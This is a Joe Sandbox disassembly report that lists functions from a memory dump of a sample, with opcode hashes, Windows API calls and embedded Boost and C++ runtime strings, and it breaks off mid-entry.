                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value
                            • String ID: )@A
                            • API String ID: 3702945584-964663934
                            • Opcode ID: f31d188394a58046fcd61eff6e3b51ac5bb85199b8a6c03775566fc7413cb432
                            • Instruction ID: 3f9ac80ab9e63e5c189cd3529ccbf7650f272e568715f3399f6b8bfdb81578f8
                            • Opcode Fuzzy Hash: f31d188394a58046fcd61eff6e3b51ac5bb85199b8a6c03775566fc7413cb432
                            • Instruction Fuzzy Hash: 8731B4B2D01209DFDB14EFA8C9499DEBFF8FF41310F10826AE815A7291D3349E458B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Getcvt$H_prologLocinfo::_std::_
                            • String ID: false$true
                            • API String ID: 312723928-2658103896
                            • Opcode ID: 06ac028dd23ed2cc637c0f04b08e6e6cdaeaca24eb427d601aaf97b6d71e5260
                            • Instruction ID: 98a047b2ec92a666e2e095e22c023d93f1b6ca525b1dc81a2246c472c5db7a08
                            • Opcode Fuzzy Hash: 06ac028dd23ed2cc637c0f04b08e6e6cdaeaca24eb427d601aaf97b6d71e5260
                            • Instruction Fuzzy Hash: E8218EB1804744AECB21DFA5C4419AEBBF8EF85310F10855FE45597612C7789A05CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00412F5C: __EH_prolog.LIBCMT ref: 00412F61
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00413103
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041310E
                            • new.LIBCMT ref: 0041311F
                              • Part of subcall function 0041308A: __EH_prolog.LIBCMT ref: 0041308F
                              • Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: a0A$5A
                            • API String ID: 1193697898-3613670376
                            • Opcode ID: 0453ab6e11982f829910caa79824c4668a638d97d96eae85b71ff3758c7a650f
                            • Instruction ID: 5228e2c018721e28874958e8575dc73d0ed4b1a8756d38538d9b1c8856c80e62
                            • Opcode Fuzzy Hash: 0453ab6e11982f829910caa79824c4668a638d97d96eae85b71ff3758c7a650f
                            • Instruction Fuzzy Hash: 9421F3B1A00209EFC704DFA8C449A9DBBF9FF48318F10425EE5149B682D7B5E945CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C08
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C21
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,006BAFEF,000000FF,?,00414B54), ref: 00414C3C
                              • Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
                              • Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B
                              • Part of subcall function 004146D0: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004146EE
                              • Part of subcall function 004146D0: CloseHandle.KERNEL32(?), ref: 004146F7
                              • Part of subcall function 004146D0: TerminateThread.KERNEL32(?,00000000), ref: 00414711
                              • Part of subcall function 0041B25A: CloseHandle.KERNEL32(?,?,00000000,?,00414B30,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041B26A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CompletionCriticalDeleteErrorLastMultipleObjectsPostQueuedSectionStatusTerminateThreadWait
                            • String ID: IKA$yFA
                            • API String ID: 1875059124-2675676849
                            • Opcode ID: 385b1d9adf83e12845914198d8f8e7a0cb604735594edb2dc88d8fb92c501079
                            • Instruction ID: 87ecea2992fb7e7ac7017cbf84a817d9d6a6f21c01299ea272fee8c8fe13b94b
                            • Opcode Fuzzy Hash: 385b1d9adf83e12845914198d8f8e7a0cb604735594edb2dc88d8fb92c501079
                            • Instruction Fuzzy Hash: CD21C031400784EBD721EF65CA057DEBBF5EF40714F14455EE08257A91CBB82A88CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: asio.ssl.stream error$stream truncated$unexpected result$unspecified system error
                            • API String ID: 3519838083-2829376187
                            • Opcode ID: dbb5516d7c3d89220cb4e4ca4bcf79310b10f97cd92497cff856f96e53a8ec9a
                            • Instruction ID: 65e10c3dc9cb61e760b7f4d5ad23a2a917327bd022f706b357d93f4a6e5b9524
                            • Opcode Fuzzy Hash: dbb5516d7c3d89220cb4e4ca4bcf79310b10f97cd92497cff856f96e53a8ec9a
                            • Instruction Fuzzy Hash: F0F030B1A84325EB8714DF9CE5459E97BA4BF55780F00420BB84992681C6FE89C0879A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8a423657d6bb5382cc7bc649591f87164532835b2354604c8317a08be089027
                            • Instruction ID: 24ba474dbbdd3b28a4a5c7296d2cea6c369e8b687720244efb5db8b9d57c0838
                            • Opcode Fuzzy Hash: a8a423657d6bb5382cc7bc649591f87164532835b2354604c8317a08be089027
                            • Instruction Fuzzy Hash: FA71AF319002569BDF218F59C884AFFBB7FEF55370F24422AE811A7A81DB718D46C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 005CCF80: CloseHandle.KERNEL32(00000000,2D5DBC68), ref: 005CCFDA
                              • Part of subcall function 005CCF80: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,?,005CCF59,2D5DBC68), ref: 005CCFF5
                            • ReleaseSemaphore.KERNEL32(?,000000FF,00000000,2D5DBC68,?,?,?,?,00000000,006DC152,000000FF,?,005CD34F,2D5DBC68,?), ref: 005CD216
                            • ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,00000000,006DC152,000000FF,?,005CD34F,2D5DBC68,?), ref: 005CD23E
                            • CloseHandle.KERNEL32(?,2D5DBC68,?), ref: 005CD286
                            • CloseHandle.KERNEL32(00000000,?,?,2D5DBC68,?), ref: 005CD2D9
                            • SetEvent.KERNEL32(?), ref: 005CD2E0
                              • Part of subcall function 00410CD6: CloseHandle.KERNEL32(00000000), ref: 00410CFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                            • String ID:
                            • API String ID: 4166353394-0
                            • Opcode ID: 60a81e64972fc3c5596f69fe96608fcf8635a61ed737797c15b586011bca7ab0
                            • Instruction ID: ff90909f970adabf3b9b36100020f746d6f59d66c93a268ebd824719c57fa00f
                            • Opcode Fuzzy Hash: 60a81e64972fc3c5596f69fe96608fcf8635a61ed737797c15b586011bca7ab0
                            • Instruction Fuzzy Hash: FD41DA75A002059FEB258F98DC84F2ABBB9FB45321F1446BDEC18DB292D634DC41CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00425477
                            • EnterCriticalSection.KERNEL32(?), ref: 0042548B
                            • LeaveCriticalSection.KERNEL32(?), ref: 004254A1
                            • EnterCriticalSection.KERNEL32(?), ref: 004254D5
                            • LeaveCriticalSection.KERNEL32(?), ref: 004254FE
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$H_prolog
                            • String ID:
                            • API String ID: 1633115879-0
                            • Opcode ID: 0fe3a8d94ac154ace3413d1bb34da292f4e706d2249084d226980c37feef89e6
                            • Instruction ID: ac3abf8c6277ae92739443647cd5a365db8cf16a597941e0b50f57c79c2548f0
                            • Opcode Fuzzy Hash: 0fe3a8d94ac154ace3413d1bb34da292f4e706d2249084d226980c37feef89e6
                            • Instruction Fuzzy Hash: 42113431A45689EFDB01EBA4D9447FEBF78EF11312F54010AE440A3281C7780B88C7AA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _free.LIBCMT ref: 006B2E1E
                              • Part of subcall function 006A071F: RtlFreeHeap.NTDLL(00000000,00000000,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?), ref: 006A0735
                              • Part of subcall function 006A071F: GetLastError.KERNEL32(?,?,006B30B9,?,00000000,?,00000000,?,006B335D,?,00000007,?,?,006B3746,?,?), ref: 006A0747
                            • _free.LIBCMT ref: 006B2E30
                            • _free.LIBCMT ref: 006B2E42
                            • _free.LIBCMT ref: 006B2E54
                            • _free.LIBCMT ref: 006B2E66
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 59dcfa55e4c1ebe0197b0e23b5d93812e247234f77e6c3c668d8c3ed99c6175e
                            • Instruction ID: a9bd2fc81ccc56ffc52ee5ada315827af27516196d19c29db94d0d854f5d902a
                            • Opcode Fuzzy Hash: 59dcfa55e4c1ebe0197b0e23b5d93812e247234f77e6c3c668d8c3ed99c6175e
                            • Instruction Fuzzy Hash: 08F090B2500205AB9660FB69E8E6C8B73EBBA057107645C09F105D7A60CB34FCC18F7C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00419764
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 0041976F
                              • Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
                              • Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
                              • Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE
                              • Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
                            • String ID: @$a
                            • API String ID: 3644655947-1149691066
                            • Opcode ID: 3b5b8556bd1bdac272b59f0152efe826c713ddc6596facfff1cf8d5a23eda2a9
                            • Instruction ID: d66daccddaeb2d3ad5201b83bf8248fc7281e3163b32ea7fe0d6d35e5a3db004
                            • Opcode Fuzzy Hash: 3b5b8556bd1bdac272b59f0152efe826c713ddc6596facfff1cf8d5a23eda2a9
                            • Instruction Fuzzy Hash: CC81E671D0424CAEDB00EFE9D881BDDBBB8AF59304F10412EF515A7291EB785E84CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0043102D
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00431038
                              • Part of subcall function 00460CFB: __EH_prolog.LIBCMT ref: 00460D00
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                              • Part of subcall function 004B201B: __EH_prolog.LIBCMT ref: 004B2020
                              • Part of subcall function 004B201B: _strlen.LIBCMT ref: 004B203A
                              • Part of subcall function 004B20A2: __EH_prolog.LIBCMT ref: 004B20A7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateExceptionException@8RaiseThrow_strlenstd::_
                            • String ID: FpY$dpY
                            • API String ID: 4023453450-3650155637
                            • Opcode ID: 73a67dee49863af33d5f46c814c7f9ecdd7f116e1159cf3a49f6f21767ee7f63
                            • Instruction ID: fb2447aa34764a571abd3f9cec200c76fe2e6f71027938b77562c14ccfdb4a2d
                            • Opcode Fuzzy Hash: 73a67dee49863af33d5f46c814c7f9ecdd7f116e1159cf3a49f6f21767ee7f63
                            • Instruction Fuzzy Hash: EF718FB1D04248EEDF00EFA9C846ADEBFB4AF56304F54409EE40577252DB781E45CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00472DF8
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateH_prologstd::_
                            • String ID: 0$;$p
                            • API String ID: 3881773970-3246451993
                            • Opcode ID: 25c25d5646e568f5cffa35d509f10dc034af25ee65ede6c3b2d68afe1ee59616
                            • Instruction ID: ae006c7664ab914648c69fb3280df63de5fa729f7eb102c209364f70d6f62fbc
                            • Opcode Fuzzy Hash: 25c25d5646e568f5cffa35d509f10dc034af25ee65ede6c3b2d68afe1ee59616
                            • Instruction Fuzzy Hash: 4861F371D05288DADF00EFA9D9867DDBFB4AF65304F10809EE509A7282DB781B48CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B5597
                              • Part of subcall function 004BE812: __EH_prolog.LIBCMT ref: 004BE817
                              • Part of subcall function 00426744: __EH_prolog.LIBCMT ref: 00426749
                              • Part of subcall function 004B85B1: __EH_prolog.LIBCMT ref: 004B85B6
                              • Part of subcall function 004B85B1: __CxxThrowException@8.LIBVCRUNTIME ref: 004B8618
                            Strings
                            • void __cdecl boost::property_tree::xml_parser::read_xml_internal<class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class st, xrefs: 004B562E
                            • e, xrefs: 004B5635
                            • read error, xrefs: 004B55FF
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$Exception@8Throw
                            • String ID: e$read error$void __cdecl boost::property_tree::xml_parser::read_xml_internal<class boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class st
                            • API String ID: 1007369359-1872691895
                            • Opcode ID: 86956b5210a13187e7ecb1da0528a131ac756f7ce626937e266841199686272c
                            • Instruction ID: 77c353d1613bf1d7c6e9ff332de183f1575bb3ff2b1075d8f7d0b28d3d3f0447
                            • Opcode Fuzzy Hash: 86956b5210a13187e7ecb1da0528a131ac756f7ce626937e266841199686272c
                            • Instruction Fuzzy Hash: 63613170E01258DECB21DFA9C980ADDFBB1BF18304F5081AEE449B7241DB795A84CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00412B13
                              • Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D
                              • Part of subcall function 00413005: __EH_prolog.LIBCMT ref: 0041300A
                              • Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474
                            • new.LIBCMT ref: 00412BF7
                              • Part of subcall function 00412ECB: __EH_prolog.LIBCMT ref: 00412ED0
                            Strings
                            • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00412BCD
                            • 5A, xrefs: 00412BA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)$5A
                            • API String ID: 3519838083-1110745283
                            • Opcode ID: 0a02acd04198e97da5b4294e347e402fe5ec5a190bc420b058f0fa2880f9b63a
                            • Instruction ID: 74f255da9f5d830f86434fac7068c22bc75ddf711811b1d044a069a6a3fb180b
                            • Opcode Fuzzy Hash: 0a02acd04198e97da5b4294e347e402fe5ec5a190bc420b058f0fa2880f9b63a
                            • Instruction Fuzzy Hash: CE5165B1D05248DFDB00DF98D9846EEBFF5AF15308F14806EE504AB341E7B89A88CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042F350
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0042F469
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionException@8RaiseSleepThrow
                            • String ID: $$D
                            • API String ID: 38309065-1079792385
                            • Opcode ID: e855dab888d90e1ece30763859fb7e85c47ef4f65fe9000f779bdef2e355ae8e
                            • Instruction ID: 398d64158e90a984a05c02784c47c8e746ee523f7a4b4d72c6d0a36603d5c62d
                            • Opcode Fuzzy Hash: e855dab888d90e1ece30763859fb7e85c47ef4f65fe9000f779bdef2e355ae8e
                            • Instruction Fuzzy Hash: EA411DB190120DAFEB109BA0DC89EEFBB7CFB89314F004465F609A2161D7756E48CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,2D5DBC68), ref: 005CEE82
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005CEEBD
                            • GetLastError.KERNEL32 ref: 005CEEC7
                              • Part of subcall function 005D47B0: __CxxThrowException@8.LIBVCRUNTIME ref: 005D4855
                            Strings
                            • boost::filesystem::current_path, xrefs: 005CEED1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentDirectory$ErrorException@8LastThrow
                            • String ID: boost::filesystem::current_path
                            • API String ID: 786775625-4026011040
                            • Opcode ID: 34ba431c0e3e1902e248736608bc93c538694c21e1325327c6e4db9101f2c64b
                            • Instruction ID: 2b91fbb656eadc5c54d0b58912f9313d96644c4c26ca662b6e91dc839e2a9301
                            • Opcode Fuzzy Hash: 34ba431c0e3e1902e248736608bc93c538694c21e1325327c6e4db9101f2c64b
                            • Instruction Fuzzy Hash: 3221B471600245AFD7109F69DC06B5ABBEAFF45750F04462EF80ACB790E7B4E900C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00424DE3
                              • Part of subcall function 004249FD: __EH_prolog.LIBCMT ref: 00424A02
                              • Part of subcall function 004249FD: htonl.WS2_32(7F000001), ref: 00424A9C
                              • Part of subcall function 004249FD: htonl.WS2_32(00000000), ref: 00424AF3
                              • Part of subcall function 004249FD: htonl.WS2_32(7F000001), ref: 00424AFF
                            • new.LIBCMT ref: 00424E94
                            • new.LIBCMT ref: 00424EAA
                              • Part of subcall function 00689E2F: Concurrency::cancel_current_task.LIBCPMT ref: 00689E47
                              • Part of subcall function 00414734: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 00414749
                              • Part of subcall function 00414734: GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041475B
                              • Part of subcall function 00414734: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041479E
                              • Part of subcall function 00414734: GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 004147B0
                              • Part of subcall function 00414734: GetLastError.KERNEL32(?,?,?,?,?,?,?,00414B24,00000000), ref: 00414816
                              • Part of subcall function 00414734: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041482C
                              • Part of subcall function 00414734: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041483A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLasthtonl$CloseCreateEventH_prologHandle$Concurrency::cancel_current_task
                            • String ID: yFA
                            • API String ID: 2183375162-60363592
                            • Opcode ID: 2299be1529cdf88c418909576b262e71cfe97009283923b2b8674ba0aa90b7fe
                            • Instruction ID: e2410ec6b11046f468dd03ba1824684763ecf8a3f1899d7cf40a9b1897127717
                            • Opcode Fuzzy Hash: 2299be1529cdf88c418909576b262e71cfe97009283923b2b8674ba0aa90b7fe
                            • Instruction Fuzzy Hash: 3231E2B0A01785FEE704DFA9C545B89FFB4BF50304F10826EE1589B282C7B85A54CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004140FE
                            • __ExceptionPtrCopy.LIBCPMT ref: 0041412F
                              • Part of subcall function 00582D26: _Reset.LIBCPMT ref: 00582D3A
                            • __ExceptionPtrCopy.LIBCPMT ref: 00414167
                              • Part of subcall function 00582DB3: shared_ptr.LIBCPMT ref: 00582DBB
                              • Part of subcall function 00582D16: shared_ptr.LIBCPMT ref: 00582D1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CopyExceptionshared_ptr$H_prologReset
                            • String ID: )@A
                            • API String ID: 3356224348-964663934
                            • Opcode ID: 25f800c6cad72c364c18cfbcf649618c335befb1227d7aeb18aff7734a65c357
                            • Instruction ID: f99f7249fa56ae8e0a70bdf426ee4549c90b71bd115ae9360ca48c8d4fa7b845
                            • Opcode Fuzzy Hash: 25f800c6cad72c364c18cfbcf649618c335befb1227d7aeb18aff7734a65c357
                            • Instruction Fuzzy Hash: 572150B2C01209AFDB10EFA8C94A9DEBFF8FF45310F10865AE415A3291E7759B058B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateDirectoryExW.KERNEL32(?,?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDD3
                            • CreateDirectoryW.KERNEL32(?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDEA
                            • GetLastError.KERNEL32(00000000), ref: 005CEDFD
                            Strings
                            • boost::filesystem::create_directory, xrefs: 005CEE35
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateDirectory$ErrorLast
                            • String ID: boost::filesystem::create_directory
                            • API String ID: 2485089472-2941204237
                            • Opcode ID: 87f316f5aeb29a15cda193debe7de4ad6898654a8b1890c078107965bcce6c81
                            • Instruction ID: 96c0899df0d94e7376a23c1fd91879f38e820a2f8e8e5f01917be07ba15b2510
                            • Opcode Fuzzy Hash: 87f316f5aeb29a15cda193debe7de4ad6898654a8b1890c078107965bcce6c81
                            • Instruction Fuzzy Hash: 65116A716043409FD720DFA9988AF47BFE9BB81759F04082DF4469B252E774D948CBB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • invalid char filename argument, xrefs: 004B21E1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologTo_wide_wcslen
                            • String ID: invalid char filename argument
                            • API String ID: 3743069396-1242024027
                            • Opcode ID: ce248c9b76cab28e3bfe0f4cf382fe857c104996694ccf4999fe2e4bab742bed
